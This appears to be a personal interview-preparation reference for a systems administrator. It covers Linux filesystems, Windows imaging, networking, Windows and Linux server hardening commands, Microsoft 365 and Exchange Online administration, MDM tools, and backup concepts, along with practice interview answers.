XFS | High-performance, scalable. Excellent for large files and high-throughput workloads. RHEL default since v7. | Large data, media, databases, RHEL servers
Btrfs | Copy-on-write, built-in snapshots, RAID, checksums. Modern but less proven than ext4 for enterprise production. | Snapshots, Fedora, some enterprise use
ZFS | Enterprise-grade. Built-in RAID (RAIDZ), snapshots, compression, dedup, checksums. Memory-hungry. Not in mainline kernel. | Storage servers, FreeBSD/Solaris, NAS appliances
NFS | Network filesystem — mount remote shares over network. Your Isilon exports were NFS. | Shared storage, VMware NFS datastores, home dirs
tmpfs | RAM-based filesystem. Extremely fast. Lost on reboot. Mounted at /tmp, /run. | Temporary files, fast scratch space
# Common Linux filesystem commands
df -h                      # disk usage by filesystem
du -sh /var/log/           # size of directory
lsblk                      # list block devices and mount points
blkid                      # show UUIDs and filesystem types
mount /dev/sdb1 /mnt/data  # mount a disk
umount /mnt/data
fsck /dev/sdb1             # filesystem check (run unmounted)
e2fsck -f /dev/sdb1        # ext4 specific check
xfs_repair /dev/sdb1       # XFS repair

# /etc/fstab — persistent mounts
UUID=xxxx-xxxx /mnt/data ext4 defaults 0 2

# Format a new disk
mkfs.ext4 /dev/sdb1
mkfs.xfs /dev/sdb1
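The fstab entry above has six whitespace-separated fields: device, mount point, filesystem type, mount options, dump flag, and fsck pass order. A small parser makes the field order easy to remember; the `FstabEntry` and `parse_fstab_line` names are made up for this sketch.

```python
from typing import NamedTuple


class FstabEntry(NamedTuple):
    device: str
    mount_point: str
    fs_type: str
    options: list
    dump: int
    fsck_pass: int


def parse_fstab_line(line):
    """Parse one /etc/fstab line; return None for blank lines and comments."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = line.split()
    if len(fields) < 4:
        raise ValueError(f"expected at least 4 fields, got {len(fields)}")
    # The last two fields are optional and default to 0
    dump = int(fields[4]) if len(fields) > 4 else 0
    fsck_pass = int(fields[5]) if len(fields) > 5 else 0
    return FstabEntry(fields[0], fields[1], fields[2], fields[3].split(","), dump, fsck_pass)


entry = parse_fstab_line("UUID=xxxx-xxxx /mnt/data ext4 defaults 0 2")
print(entry.mount_point, entry.fs_type, entry.fsck_pass)
```

A pass value of 1 is conventionally reserved for the root filesystem, 2 for other filesystems that should be checked, and 0 to skip the check.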

Imaging — Windows Deployment

Imaging Tools Overview

Tool | What it does | Complexity
Sysprep | Generalizes a Windows installation — removes machine-specific info (SID, hostname, hardware config) so it can be deployed to other hardware. Required before capturing any Windows image. | Basic — built into Windows
WDS (Windows Deployment Services) | PXE boot server — workstations boot from network and pull a WIM image. Basic deployment. Built into Windows Server. | Low — simple environments
MDT (Microsoft Deployment Toolkit) | Free toolkit from Microsoft. Task sequences to automate full OS deployment: format disk → apply WIM → install drivers → apply updates → join domain → install apps. Works standalone or integrated with SCCM/Intune. | Medium — small/mid-size orgs
SCCM / MECM | Enterprise Microsoft tool. Full lifecycle: OS deployment, software deployment, patch management, inventory, compliance. OSD (OS Deployment) task sequences are the gold standard for large orgs. | High — enterprise
Clonezilla | Open-source disk cloning. Sector-by-sector copy or partition-level. Good for small shops, bare-metal recovery, physical-to-physical cloning. | Low
Intune Autopilot | Modern cloud-based zero-touch provisioning. New device registers with Autopilot → user signs in with Azure AD credentials → Intune pushes apps, config, policies automatically. No imaging required. | Medium — modern cloud shops

Sysprep / WIM Workflow

  • 1. Build reference machine — Install Windows, drivers, common apps. Fully patch. Configure settings.
  • 2. Run Sysprep — sysprep /generalize /oobe /shutdown removes the SID and hostname and resets the machine to the Out-of-Box Experience. Machine shuts down.
  • 3. Capture WIM — Boot to WinPE. Use DISM or MDT to capture the disk to a .WIM file, saving it to a different volume or network share than the one being captured: dism /Capture-Image /ImageFile:D:\images\win11.wim /CaptureDir:C:\ /Name:"Win11-Base"
  • 4. Deploy WIM — DISM applies the WIM to target machines, or PXE boot via WDS/MDT picks it up automatically.
  • 5. Specialize — Machine boots, Sysprep generates new unique SID, runs unattend.xml for customizations (hostname, domain join, regional settings).

Key Imaging Concepts

WIM (Windows Imaging Format) | Microsoft's image format. File-based (not sector-by-sector), so it's hardware-independent. One WIM can contain multiple images (editions). DISM manages WIM files.
PXE Boot | Preboot Execution Environment. Machine boots from its NIC and contacts the WDS/MDT server to pull an image. No boot media needed. Requires DHCP options 66/67, or IP helper (DHCP relay) addresses on the router when clients and the deployment server sit in different subnets.
WinPE | Windows Preinstallation Environment — lightweight Windows that boots before the OS. Used for imaging, disk partitioning, DISM operations, recovery.
SID | Security Identifier — unique identifier for each Windows computer/user. Sysprep removes the machine SID so each deployed machine gets a unique one. Without Sysprep, cloned machines have duplicate SIDs = AD/domain issues.
Driver Injection | Adding hardware drivers to a WIM offline with DISM before deployment. Ensures the image works on different hardware models. Example against a mounted image (paths are placeholders): dism /Image:C:\mount /Add-Driver /Driver:C:\drivers /Recurse
DISM | Deployment Image Servicing and Management. Command-line tool — capture, apply, mount, and service WIM images. Inject drivers, updates, features into a WIM offline.

Networking Fundamentals — Quick Reference

Key Ports to Know

Port | Protocol | Service
22 | SSH | Secure shell — Linux/network device remote access
25 | SMTP | Email sending (server to server)
53 | DNS | Domain Name System
67/68 | DHCP | IP address assignment
80 | HTTP | Web traffic (unencrypted)
88 | Kerberos | AD authentication
135/445 | RPC/SMB | 135 = RPC endpoint mapper (AD communication), 445 = SMB (Windows file sharing)
389/636 | LDAP/LDAPS | AD queries (636 = encrypted)
443 | HTTPS | Secure web traffic
3389 | RDP | Remote Desktop — never expose to internet
5985/5986 | WinRM | PowerShell remoting (5986 = HTTPS)

Subnetting Quick Reference

CIDR | Subnet Mask | Hosts | Common Use
/24 | 255.255.255.0 | 254 | Standard office subnet
/25 | 255.255.255.128 | 126 | Split /24 in half
/26 | 255.255.255.192 | 62 | Small department
/30 | 255.255.255.252 | 2 | Point-to-point links
/16 | 255.255.0.0 | 65,534 | Large enterprise / VNet
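Every row in that table comes from one formula: usable hosts = 2^(32 − prefix) − 2, where the two subtracted addresses are the network and broadcast addresses. Python's standard `ipaddress` module can confirm the numbers; the 10.0.0.0 base network and the `subnet_summary` name are arbitrary choices for the example.

```python
import ipaddress


def subnet_summary(cidr):
    """Return (subnet mask, usable host count) for an IPv4 network up to /30."""
    net = ipaddress.ip_network(cidr, strict=True)
    # Usable hosts = total addresses minus network and broadcast
    usable = net.num_addresses - 2
    return str(net.netmask), usable


for prefix in (24, 25, 26, 30, 16):
    mask, hosts = subnet_summary(f"10.0.0.0/{prefix}")
    print(f"/{prefix:<2} {mask:<16} {hosts:>6} hosts")
```

One cloud-specific wrinkle worth knowing: Azure reserves five addresses in every subnet rather than two, so a /24 in a VNet yields 251 usable addresses.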

Windows Server Hardening

Account & Authentication

  • Rename or disable the built-in Administrator account. Create a named admin account instead.
  • Disable the Guest account.
  • Enforce strong password policy via GPO: minimum 12 chars, complexity, no reuse of last 24, max age 90 days.
  • Account lockout: 5 bad attempts, 30-minute lockout, reset counter after 30 minutes.
  • Require MFA for all admin/privileged accounts.
  • Use PIM (Privileged Identity Management) — just-in-time elevation instead of standing admin accounts.
  • Implement LAPS (Local Administrator Password Solution) — unique, rotating local admin password per machine stored in AD. Eliminates lateral movement via shared local admin passwords.
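The lockout settings in the list above (5 bad attempts, 30-minute lockout, counter reset after 30 minutes) interact in a way that is easier to see in code. This is a simplified model for study purposes, not Windows' actual implementation; the `LockoutPolicy` class is hypothetical.

```python
from datetime import datetime, timedelta


class LockoutPolicy:
    """Toy model of threshold / lockout duration / reset-counter settings."""

    def __init__(self, threshold=5, lockout=timedelta(minutes=30),
                 reset_after=timedelta(minutes=30)):
        self.threshold = threshold
        self.lockout = lockout
        self.reset_after = reset_after
        self.count = 0
        self.last_failure = None
        self.locked_until = None

    def is_locked(self, now):
        return self.locked_until is not None and now < self.locked_until

    def record_failure(self, now):
        """Register a bad password attempt; return True if the account is locked."""
        if self.is_locked(now):
            return True
        # Counter resets once enough time has passed since the last bad attempt
        if self.last_failure is not None and now - self.last_failure >= self.reset_after:
            self.count = 0
        self.count += 1
        self.last_failure = now
        if self.count >= self.threshold:
            self.locked_until = now + self.lockout
            self.count = 0
        return self.is_locked(now)


policy = LockoutPolicy()
start = datetime(2024, 1, 1, 9, 0)
for minute in range(5):
    locked = policy.record_failure(start + timedelta(minutes=minute))
print("Locked after 5 rapid failures:", locked)
```

The takeaway: five failures spread over several hours never trip the lockout, because the counter resets in between. That is why slow password-spray attacks need log monitoring (event 4625), not just a lockout policy.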

Network & Services

  • Windows Firewall enabled on all profiles (Domain, Private, Public). Configure via GPO.
  • Disable SMBv1 — legacy, vulnerable to EternalBlue/WannaCry. Disable via PowerShell: Set-SmbServerConfiguration -EnableSMB1Protocol $false
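  • Disable NetBIOS over TCP/IP and LLMNR where not needed. Both are fallback name-resolution protocols that an attacker on the local network can poison to capture or relay NTLM authentication.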
  • Disable unnecessary services: Print Spooler (on non-print servers), Fax, Telnet, SNMP if not used.
  • Enable NLA (Network Level Authentication) for RDP — requires auth before session is established.
  • Restrict RDP access by firewall rule — source IP whitelist, not open to 0.0.0.0/0.
  • Enable Windows Defender / Defender for Endpoint. Keep definitions current.

Patching & Updates

  • Apply security patches on a defined schedule — critical within 24–72hrs of release, high within 7 days, medium within 30 days.
  • Use WSUS or MECM/Intune to manage patching centrally. Never rely on individual machines updating themselves.
  • Test patches in non-prod first for critical servers. Have rollback plan (snapshot before patching).
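The patch schedule above translates directly into deadlines you can report against. A minimal sketch that takes the outer bound of each window (72 hours, 7 days, 30 days) from the first bullet; the function names are made up for the example.

```python
from datetime import datetime, timedelta

# Outer bound of each window from the patching schedule
PATCH_SLA = {
    "critical": timedelta(hours=72),
    "high": timedelta(days=7),
    "medium": timedelta(days=30),
}


def patch_deadline(severity, released):
    """Latest acceptable install time for a patch of the given severity."""
    return released + PATCH_SLA[severity.lower()]


def is_overdue(severity, released, now):
    return now > patch_deadline(severity, released)


released = datetime(2024, 3, 1, 9, 0)
print("Critical due by:", patch_deadline("critical", released))
print("High overdue on Mar 9?", is_overdue("high", released, datetime(2024, 3, 9)))
```

Feeding this from a WSUS or MECM export gives a simple overdue-patch report per server.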

Auditing & Logging

  • Enable audit policies via GPO: logon events, account management, privilege use, object access, policy changes.
  • Forward event logs to a SIEM or Log Analytics Workspace for centralized monitoring.
  • Retain security logs — minimum 90 days, 1 year for compliance environments.
  • Monitor key event IDs: 4625 (failed logon), 4740 (lockout), 4728 (added to priv group), 4648 (explicit cred logon).

Hardening Commands

# Disable SMBv1
Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
Get-SmbServerConfiguration | Select EnableSMB1Protocol,EnableSMB2Protocol

# Check open shares
Get-SmbShare | Where {$_.Name -notlike "*$"}   # non-hidden shares

# Disable unnecessary services
Set-Service -Name "Spooler" -StartupType Disabled -Status Stopped   # on non-print servers

# Enable Windows Firewall all profiles
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled True

# Check local admins
Get-LocalGroupMember -Group "Administrators"

# LAPS — check if installed, get password (legacy LAPS module; Windows LAPS uses Get-LapsADPassword)
Get-AdmPwdPassword -ComputerName "DESKTOP01"

# Require NLA for RDP (registry)
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name "UserAuthentication" -Value 1

# Check Windows Defender status
Get-MpComputerStatus | Select AMRunningMode,RealTimeProtectionEnabled,AntivirusSignatureLastUpdated

Linux Server Hardening

Account & SSH

  • Disable root SSH login: in /etc/ssh/sshd_config set PermitRootLogin no
  • Use SSH key authentication instead of passwords: PasswordAuthentication no in sshd_config.
  • Change default SSH port from 22 (optional, reduces noise — not real security). Or use fail2ban to block brute force.
  • Create a dedicated non-root user with sudo for administration. Never work as root day to day.
  • Set AllowUsers or AllowGroups in sshd_config to limit who can SSH in.
  • Enforce strong password policy: /etc/security/pwquality.conf — min length, complexity requirements.
  • Set password aging: chage -M 90 -W 14 username (expire after 90 days, warn 14 days before).
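To verify the SSH settings above rather than trust that someone applied them, a small baseline check helps. This is a sketch under stated assumptions: it reads the config as text, ignores `Match` blocks and `Include` files, and the `EXPECTED` baseline is just the two settings from this list.

```python
# Baseline taken from the bullets above. Keys are lowercased keywords.
EXPECTED = {
    "permitrootlogin": "no",
    "passwordauthentication": "no",
}


def parse_sshd_config(text):
    """Return {keyword: value}, keeping the first occurrence of each keyword
    (sshd uses the first value it reads). Comments and blanks are skipped."""
    settings = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) == 2:
            settings.setdefault(parts[0].lower(), parts[1].strip())
    return settings


def audit(text):
    """List (keyword, found, expected) for every setting that is off-baseline."""
    found = parse_sshd_config(text)
    return [(k, found.get(k, "<unset>"), v)
            for k, v in EXPECTED.items()
            if found.get(k, "").lower() != v]
```

Usage: `audit(open("/etc/ssh/sshd_config").read())` returns an empty list when both settings match. A commented-out line counts as unset, which is the point: a `#PermitRootLogin no` line does nothing.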

Network & Firewall

  • Enable firewall: firewalld (RHEL/CentOS) or ufw (Ubuntu). Block everything, allow only what's needed.
  • Check open ports: ss -tulnp or netstat -tulnp. Close anything not in use.
  • Disable IPv6 if not used: reduces attack surface. Set in /etc/sysctl.conf.
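  • TCP Wrappers (/etc/hosts.allow, /etc/hosts.deny) restrict legacy services on older systems only. They were removed in RHEL 8 and later, so use firewalld rich rules or per-service config there.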

Services & Packages

  • Minimal install — don't install what you don't need. Every unused package is a potential vulnerability.
  • Disable unnecessary services: systemctl disable --now <service>
  • Keep packages updated: yum update -y (RHEL) or apt update && apt upgrade -y (Ubuntu). Automate with cron, dnf-automatic (RHEL), or unattended-upgrades (Ubuntu).
  • Install and configure fail2ban — blocks IPs with repeated failed auth attempts.

Auditing & File Integrity

  • Enable auditd for kernel-level auditing — tracks file access, privilege escalation, system calls.
  • Install and run Lynis (open-source security auditing tool) for hardening score and recommendations.
  • Use AIDE (Advanced Intrusion Detection Environment) for file integrity monitoring — detects unauthorized file changes.
  • Audit SUID/SGID binaries: find / -perm /6000 -type f 2>/dev/null (use /4000 for SUID only, /2000 for SGID only). Know what has elevated permissions.
  • Restrict /etc/sudoers — use visudo, limit commands, use groups not individual users.
  • Forward logs to central syslog server or SIEM.
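The SUID/SGID audit above comes down to testing two mode bits. A minimal sketch of the same check in Python, useful if you want the result in a report instead of terminal output (function names are illustrative):

```python
import os
import stat


def has_suid_or_sgid(mode: int) -> bool:
    """True if a file mode carries the setuid or setgid bit."""
    return bool(mode & (stat.S_ISUID | stat.S_ISGID))


def find_privileged_files(root):
    """Walk `root` and yield regular files with SUID or SGID set."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished: skip, like 2>/dev/null
            if stat.S_ISREG(st.st_mode) and has_suid_or_sgid(st.st_mode):
                yield path
```

Compare the output against a saved baseline list; a new entry is what you investigate.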

Hardening Commands

# SSH hardening (patterns match both commented and active lines)
sed -i 's/^#\?PermitRootLogin.*/PermitRootLogin no/' /etc/ssh/sshd_config
sed -i 's/^#\?PasswordAuthentication.*/PasswordAuthentication no/' /etc/ssh/sshd_config
sshd -t && systemctl restart sshd   # validate the config before restarting

# Firewall (firewalld)
systemctl enable --now firewalld
firewall-cmd --permanent --add-service=ssh
firewall-cmd --permanent --add-port=443/tcp
firewall-cmd --permanent --remove-service=dhcpv6-client
firewall-cmd --reload
firewall-cmd --list-all

# UFW (Ubuntu)
ufw default deny incoming
ufw default allow outgoing
ufw allow 22/tcp ; ufw allow 443/tcp
ufw enable ; ufw status verbose

# Patch
yum update -y                    # RHEL/CentOS
apt update && apt upgrade -y     # Ubuntu/Debian

# Fail2ban
systemctl enable --now fail2ban
fail2ban-client status sshd

# Check SUID files (should be minimal)
find / -perm /4000 -type f 2>/dev/null

# Audit open ports
ss -tulnp

# Check running services
systemctl list-units --type=service --state=running

Hardening Q&A

Walk me through how you harden a new Windows server.
Start with the baseline before anything touches the network — disable SMBv1, rename and disable the default Administrator account, configure Windows Firewall on all profiles, and enable NLA for RDP. Then apply the organization's security GPO to bring it into the domain baseline: password policy, audit logging, AppLocker or Defender settings. Install LAPS if the org uses it so the local admin password is unique and rotating. Enable Defender and verify definitions are current. Patch it fully before putting it in production. Then it joins the monitoring stack — event logs forwarding to the SIEM, alerts configured for key event IDs.
How do you harden a new Linux server?
Minimal install is the starting point — only what's needed for the role. Create a non-root admin user with sudo, disable root SSH login, switch SSH to key-based auth only. Enable and configure firewalld or UFW — deny all inbound, allow only what the service needs. Install fail2ban to block brute force. Fully patch before going live — yum update or apt upgrade. Set up auditd for kernel-level logging and forward to the central syslog. Run Lynis to get a hardening score and work through the recommendations. Document the baseline so the next person knows what's expected.
⚠️ Limited direct admin experience. Honest bridge: mailbox support, license management, user-level M365 admin. Study this section — you'll be able to speak to it at a working knowledge level.

M365 Keywords

Microsoft 365 Admin Center · Exchange Online · SharePoint Online
OneDrive for Business · Teams · Intune
Azure AD / Entra ID · MFA · Conditional Access · SSPR
Exchange Online Protection (EOP) · Defender for M365 · Safe Links · Safe Attachments
Shared Mailbox · Distribution Group · Dynamic Group · Mailbox Alias
SPF · DKIM · DMARC · MX Record
License Assignment · M365 Business Premium · E3 / E5 · PowerShell (ExO)
Tenant · Global Admin · Exchange Admin · Helpdesk Admin

M365 Architecture — What Is It?

Microsoft 365 (formerly Office 365) is a SaaS subscription that bundles cloud productivity apps, security, and device management. For a sysadmin, the key services you'd touch:

Service | What it is | Admin tasks
Exchange Online | Cloud email platform. Replaces on-prem Exchange Server for most orgs. | Create/manage mailboxes, shared mailboxes, distribution groups, aliases, mail flow rules, spam filtering
SharePoint Online | Cloud document management and intranet platform. | Create sites/libraries, manage permissions, storage quotas
OneDrive for Business | Per-user cloud file storage. 1TB+ per user. | Monitor storage, recover deleted files, external sharing policy
Teams | Chat, video, collaboration. Backed by SharePoint (file storage) and Exchange (calendar, voicemail). | Create teams/channels, guest access, meeting policies, calling plans
Intune | MDM/MAM: manages devices and apps against Entra ID identities. Included in some M365 plans (Business Premium, E3/E5). | Device enrollment, compliance policies, app deployment
Entra ID (Azure AD) | Identity backbone for all M365 services. Users, MFA, Conditional Access. | User management, license assignment, MFA enforcement, Conditional Access policies
Defender for M365 (official name: Microsoft Defender for Office 365) | Security layer: anti-phishing, Safe Links, Safe Attachments, attack simulation. | Configure policies, review threats, run simulations

M365 Admin Centers

  • Microsoft 365 Admin Center (admin.microsoft.com): main hub. User management, license assignment, service health, billing, support tickets.
  • Exchange Admin Center, EAC (admin.exchange.microsoft.com): mailboxes, mail flow rules, spam/anti-phishing policies, connectors, message trace.
  • Azure AD / Entra Admin (entra.microsoft.com): users, groups, MFA, Conditional Access, Privileged Identity Mgmt, app registrations.
  • Intune Admin Center (intune.microsoft.com): device enrollment, compliance policies, configuration profiles, app deployment.
  • SharePoint Admin: manage sites, storage, external sharing settings, hub sites.
  • Security & Compliance: Microsoft Purview portal (purview.microsoft.com, formerly compliance.microsoft.com) for DLP policies, retention labels, eDiscovery, audit log search. Defender policies live in the Microsoft Defender portal (security.microsoft.com).

Common Exchange Online Tasks

Mailbox Types

Type | What it is | License needed?
User Mailbox | Standard personal mailbox for one user | Yes, M365 license required
Shared Mailbox | Accessed by multiple users (e.g., info@company.com, helpdesk@). No one logs into it directly. | No license if under 50GB
Room Mailbox | Represents a meeting room. Users invite the room. Auto-accepts/declines based on availability. | No license required
Equipment Mailbox | Like room but for equipment (projectors, AV cart) | No license required
Archive Mailbox | Additional mailbox storage. Old email moves there automatically under an archive/retention policy. | E3 or above, or the Exchange Online Archiving add-on

Mail Flow Concepts

  • MX Record — DNS record pointing to where email for your domain should be delivered. In M365 it points to Microsoft's servers.
  • SPF — Sender Policy Framework. TXT record that lists authorized mail servers for your domain. Reduces spoofing.
  • DKIM — DomainKeys Identified Mail. Cryptographic signature on outgoing email. Proves email wasn't tampered with in transit.
  • DMARC: Domain-based Message Authentication, Reporting and Conformance. Policy that tells receiving servers what to do if a message fails SPF/DKIM alignment: none, quarantine, or reject. Also defines where aggregate reports are sent.
  • Mail Flow Rules (Transport Rules) — conditions + actions on messages passing through Exchange Online. Example: "If subject contains 'URGENT' from external senders, add disclaimer and move to spam review."
  • Connectors — configure mail flow between M365 and on-prem Exchange (hybrid), or third-party services.
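SPF and DMARC are plain DNS TXT values, so it helps to be able to read one on sight. The sketch below parses record strings you have already looked up (for example with nslookup or dig); it does no DNS queries itself, and the function names are illustrative.

```python
def parse_dmarc(record: str) -> dict:
    """Split a DMARC TXT value such as 'v=DMARC1; p=reject; rua=mailto:x@y'
    into a dictionary of tags."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def dmarc_policy(record: str) -> str:
    """Return the p= policy (none, quarantine, or reject)."""
    tags = parse_dmarc(record)
    if tags.get("v", "").upper() != "DMARC1" or "p" not in tags:
        raise ValueError("not a valid DMARC record")
    return tags["p"].lower()


def spf_mechanisms(record: str) -> list:
    """Return the SPF terms after the version tag, e.g. include: and -all."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        raise ValueError("not an SPF record")
    return terms[1:]
```

For an M365-only domain the SPF value is typically `v=spf1 include:spf.protection.outlook.com -all`, where `-all` tells receivers to fail anything not covered by the include.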

Exchange Online PowerShell

# Connect
Install-Module ExchangeOnlineManagement
Connect-ExchangeOnline -UserPrincipalName admin@company.com

# Mailbox operations
Get-Mailbox -Identity "john.doe@company.com" | Select-Object DisplayName, RecipientTypeDetails, ProhibitSendReceiveQuota
Get-Mailbox -RecipientTypeDetails SharedMailbox | Select-Object Name, PrimarySmtpAddress
New-Mailbox -Name "Help Desk" -Alias "helpdesk" -Shared -PrimarySmtpAddress "helpdesk@company.com"
Add-MailboxPermission -Identity "helpdesk@company.com" -User "jdoe@company.com" -AccessRights FullAccess -AutoMapping $true
# Add an alias: Set-Mailbox has no -AddEmailAddresses parameter; pass a hashtable to -EmailAddresses
Set-Mailbox -Identity "jdoe@company.com" -EmailAddresses @{Add="jdoe.alt@company.com"}

# Distribution groups
Get-DistributionGroup -Identity "IT-Team"
Add-DistributionGroupMember -Identity "IT-Team" -Member "jdoe@company.com"

# Message trace (last 2 days)
Get-MessageTrace -SenderAddress "sender@external.com" -StartDate (Get-Date).AddDays(-2) -EndDate (Get-Date)

# Mailbox size report (TotalItemSize can sort as text in a remote session; sanity-check the order)
Get-Mailbox -ResultSize Unlimited | Get-MailboxStatistics | Select-Object DisplayName, TotalItemSize | Sort-Object TotalItemSize -Descending | Select-Object -First 20

# Disconnect
Disconnect-ExchangeOnline -Confirm:$false

M365 Licensing

Plan | Key Inclusions | Typical Use
M365 Business Basic | Exchange Online, Teams, SharePoint, OneDrive (web/mobile only) | Light users, frontline workers
M365 Business Standard | Above + desktop Office apps (Word/Excel/PowerPoint) | Most office users
M365 Business Premium | Above + Intune, Defender, Azure AD P1, advanced security | SMB that needs security features
M365 E3 | Full desktop Office, advanced compliance, archive mailbox, Azure AD P1 | Enterprise
M365 E5 | E3 + Defender for M365, Azure AD P2, Power BI Pro, voice | Enterprise with advanced security/compliance
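💡 License assignment: go to M365 Admin Center → Users → Active Users → select user → Licenses. Or use PowerShell: Set-MgUserLicense from the Microsoft Graph PowerShell SDK (modern). Set-MsolUserLicense (MSOnline) and Set-AzureADUserLicense (AzureAD) are the legacy modules, which Microsoft has deprecated.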

M365 Interview Q&A

What's your M365 experience?
My M365 experience is at the support and user administration level rather than deep Exchange or compliance admin. I've handled user mailbox creation and offboarding, shared mailbox setup, license assignment and reclamation, and distribution group management. I've done password resets and MFA troubleshooting through the Entra ID admin center, and I've worked with mailbox permissions to grant access to shared mailboxes. For deeper Exchange administration, such as mail flow (transport) rules and connectors, I have working familiarity but not deep hands-on experience. I learn it quickly when I need to use it.
Short and honest. Don't claim deep Exchange admin — you don't have it. This answer is defensible and sets honest expectations.
A user says they're not receiving email — how do you troubleshoot?
Start in the Exchange Admin Center with Message Trace — search by recipient address and time window to see what's happening to the mail: delivered, quarantined, failed, or redirected. If it shows delivered, the problem is likely client-side — Outlook sync, profile corruption, or a local rule filtering messages. If quarantined, check the spam/anti-phishing policy. If failed, look at the rejection reason — could be a domain issue, quota exceeded, or mail flow rule blocking it. Also check if the mailbox is over quota — that'll reject inbound mail and the user won't know it.
What's the difference between a shared mailbox and a distribution group?
A shared mailbox is an actual mailbox — it receives, stores, and sends email. Multiple users can have access to it with Full Access and Send As permissions. It has storage, calendar, contacts. A distribution group is just a routing list — you send to the group, it fans out to everyone in it. No storage, no calendar. If the use case is "a team needs to see and respond to the same emails" — shared mailbox. If the use case is "send a company announcement to everyone in IT" — distribution group.
⚠️ No direct Intune or JAMF. Bridge via BigFix + Horizon DEM. Honest, defensible answers.

MDM Concept Comparison

Tool | Platform | Key Capabilities | Your Level
Intune | Windows, Mac, iOS, Android | Enrollment, compliance policies, app deployment, BitLocker, Conditional Access integration | No direct experience; bridge via BigFix
JAMF Pro | Mac / Apple ecosystem | Mac DEP/ADE enrollment, profiles, scripts, app catalog, OS updates, inventory | None; bridge via BigFix concepts
BigFix | Windows, Linux, Mac, AIX | Patch mgmt, software deployment, compliance reporting, custom fixlets | Real: Disney + CMS
Horizon DEM | Windows VDI | Profile management, app config, folder redirection | Real: CMS 2,000+ users

Honest Bridge Answers

What's your Intune or JAMF experience?
I haven't used Intune or JAMF directly, but I've managed enterprise endpoints at scale with equivalent tools. At Disney I used IBM BigFix for patch deployment and policy compliance across 80+ Linux servers. The workflow is the same as Intune or JAMF: enrollment, policy push, compliance reporting, patch automation. At CMS I managed VMware Horizon DEM for 2,000+ VDI users, covering profile policies, app controls, and folder redirection, which is conceptually the same as Intune applying policy to a managed Windows device. The underlying logic transfers. I'd expect a learning curve on the specific consoles, not on the concepts.
If we gave you a JAMF console tomorrow, how would you approach it?
Orient first — understand what's enrolled, what policies are active, what the current baseline looks like before touching anything. Then JAMF's documentation and Jamf Nation community resources are excellent. Within a week I'd be handling day-to-day Mac management tasks. I already understand the concepts: enrollment profiles, configuration profiles, scripts, patch management — the JAMF-specific implementation is what I'd learn on the job.
⚠️ No direct Rubrik. Bridge: Dell CloudSnapshot Manager (AWS) + Azure Backup + EMC Isilon. Strong domain knowledge — new tool only.

Storage Types — Complete Reference

Type | Protocol | Access Model | Use Case | Your Experience
DAS | SATA, SAS, NVMe | Block, single server | OS drives, local DBs | Server disks generally
NAS | NFS (Linux), SMB (Windows) | File, shared over network | File shares, home dirs, VMware NFS datastores | ✅ EMC Isilon, 3 clusters at Disney
SAN | Fibre Channel, iSCSI | Block, presented as local disk | VMware VMFS datastores, databases | iSCSI experience
Object Storage | HTTP/S REST API | Object: flat, metadata-rich | Backups, archives, logs at scale | ✅ AWS S3, Azure Blob at CMS
vSAN | VMware proprietary | Block distributed across ESXi hosts | HCI, no external storage | Conceptual
💡 EMC Isilon = scale-out NAS. Adds nodes horizontally. NFS and SMB exports. Media, large unstructured data. Your 3 Disney clusters fed VMware NFS datastores.

Backup Types — Full Reference

Type | Captures | Backup Speed | Restore Speed | Storage | Notes
Full | Everything, every time | Slowest | Fastest (one set) | Most | Foundation of any backup strategy. Required to start any chain.
Incremental | Changed since LAST backup (any type) | Fastest | Slowest (need full + all incrementals) | Least | Long restore chain = restore risk. Rubrik avoids this with incremental-forever + synthetic full.
Differential | Changed since last FULL | Medium (grows daily) | Fast (full + 1 diff) | Medium (grows until next full) | Simpler restore than incremental. Grows large before the next full.
Snapshot | Point-in-time storage state (delta) | Near-instant | Near-instant | Grows as changes accumulate | NOT a backup: same storage system. Safety net for changes. Rubrik captures snapshots then moves data off to its own storage.
CDP (Continuous Data Protection) | Every write in real time | Always running | Any point in time | High | Near-zero RPO. Used for critical DBs. High overhead.
Synthetic Full | Constructs full from existing chain without reading source | Server-side process | Fastest (treated as full) | Efficient | Rubrik's secret weapon. All recovery points look like fulls. No weekly full backup window needed.
Mirror/Clone | Exact copy of data, updated continuously | Continuous | Instant (already a full copy) | 2x | RAID-1 or replication. Not backup by itself: doesn't protect against logical corruption or ransomware.
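The restore-speed column follows directly from how many backup sets each type needs. A minimal sketch that makes the chains concrete, assuming a schedule that uses one style per cycle (all incrementals or all differentials between fulls); the function name and labels are illustrative:

```python
def restore_chain(backups, target_index):
    """Return the indexes of the backups needed to restore to
    backups[target_index].

    `backups` is a chronological list of "full", "incr", or "diff".
    """
    target = backups[target_index]
    # Walk back to the most recent full at or before the target.
    full_index = max(i for i in range(target_index + 1)
                     if backups[i] == "full")
    if target == "full":
        return [target_index]
    if target == "diff":
        # A differential holds everything changed since the last full.
        return [full_index, target_index]
    # Incremental: the full plus every incremental after it, in order.
    return list(range(full_index, target_index + 1))
```

With a Sunday full and three weekday backups, restoring Wednesday needs four sets on an incremental schedule and two on a differential schedule. Lose any one incremental in the middle and the later points are gone, which is the restore risk the table mentions.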

Application-Consistent vs Crash-Consistent

Application-Consistent ✅ Preferred

  • App notified before snapshot — flushes writes to disk, quiesces I/O
  • Windows: VSS (Volume Shadow Copy Service)
  • Linux: pre/post freeze scripts or agent
  • Result: Clean, guaranteed consistent restore. Like a proper shutdown.
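  • Rubrik and Azure Backup attempt this by default where the guest supports it (VSS on Windows; Linux generally needs pre/post scripts, otherwise you get file-system consistency)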

Crash-Consistent ⚠️

  • Snapshot without notifying the app — whatever's on disk in that instant
  • Like pulling the power cord — in-flight writes may be lost
  • Usually OK for OS — Windows/Linux can recover (chkdsk/fsck)
  • Risky for databases — may need transaction log replay
  • Happens when VMware Tools/agent not installed or VSS fails

Key Backup Strategy Concepts

RPO (Recovery Point Objective) — max data loss acceptable. "4-hour backup = 4-hour max RPO." Drives frequency.
